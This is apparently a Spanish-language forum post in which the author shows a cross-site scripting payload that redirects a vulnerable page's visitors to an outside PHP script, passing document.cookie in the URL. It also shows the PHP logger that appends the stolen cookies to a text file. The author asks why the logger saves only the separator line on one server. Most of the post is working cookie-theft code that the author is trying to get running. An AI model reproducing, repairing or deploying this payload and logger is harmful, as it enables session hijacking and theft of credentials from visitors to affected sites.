Código:
<script>document.location='http://mipagina.com/archivo.php?x='+document.cookie;</script>
donde archivo.php contiene lo siguiente:
Código:
1.
<?php
2.
$fp = fopen("datos.txt", "a+");
3.
$cookie = $_GET['x'];
4.
$salto = "\n-----------------------------\n";
5.
fwrite($fp,$salto);
6.
fwrite($fp,$cookie);
7.
fclose($fp);
8.
?>
Pero si el archivo php está hospedado en un servidor funciona y en otro no. En el que no funciona le di todos los permisos a la carpeta (777) y a los archivos que contiene para que pueda almacenar los datos, pero solo guarda la linea punteada "$salto", porqué puede suceder esto?
cuando la pagina vulnerable se redirecciona, en la url se ve todo el contenido de la cookie por document.cookie, pero estos datos no son tomados para ser escritos